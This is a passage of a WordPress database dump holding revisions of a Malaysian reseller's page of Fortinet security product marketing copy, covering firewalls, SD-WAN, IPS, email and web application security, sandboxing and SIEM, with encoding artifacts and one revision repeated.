14:15:11','2019-09-30 06:15:11','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3561,1,'2019-09-30 14:18:55','2019-09-30 06:18:55','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Operationalized Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Cross Silo Automation</strong></h5>\r\n</li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified Management</strong></h5>\r\n</li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Detection</strong></h5>\r\n</li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Fortinet Fabric</strong></h5>\r\n</li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n\r\n&nbsp;\r\n<h2>INFRASTRUCTURE PROTECTION</h2>\r\n<h4><strong>1. Endpoint Protection</strong></h4>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Broad endpoint visibility</strong></h5>\r\n</li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proactive endpoint defense</strong></h5>\r\n</li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated threat containment</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure remote access</strong></h5>\r\n</li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Easy to deploy and manage</strong></h5>\r\n</li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Wireless</strong></h4>\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\r\n</li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Zero-touch deployment</strong></h5>\r\n</li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\r\n</li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Free location and analytics</strong></h5>\r\n</li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\r\n</li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>Switching</strong></h4>\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li>\r\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Highly Scalable</strong></h5>\r\n</li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unparalleled Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\r\n</li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Virtual Stacking</strong></h5>\r\n</li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Email Security</strong></h4>\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Independently certified advanced threat defense</strong></h5>\r\n</li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Integrated data protection</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance mail handling</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise-class management</strong></h5>\r\n</li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n\r\n&nbsp;\r\n<h2>APPLICATION SECURITY</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Web Application Firewall (WAF)</strong></h4>\r\n</li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proven Web Application Protection</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li>\r\n<h5><strong>AI-based Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware-based Acceleration</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li>\r\n<h5><strong>False Positive Mitigation Tools</strong></h5>\r\n</li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced Visual Analytics</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure Traffic Management</strong></h5>\r\n</li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Application Optimization</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Global Server Load Balancing</strong></h5>\r\n</li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Features</strong></h5>\r\n</li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>DDoS</strong></h4>\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3></h3>\r\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>Sandbox</strong></h4>\r\n</li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Asset Self-Discovery</strong></h5>\r\n</li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\r\n</li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated Workflow</strong></h5>\r\n</li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Platform</strong></h5>\r\n</li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 14:18:55','2019-09-30 06:18:55','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3563,1,'2019-09-30 14:21:40','2019-09-30 06:21:40','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of 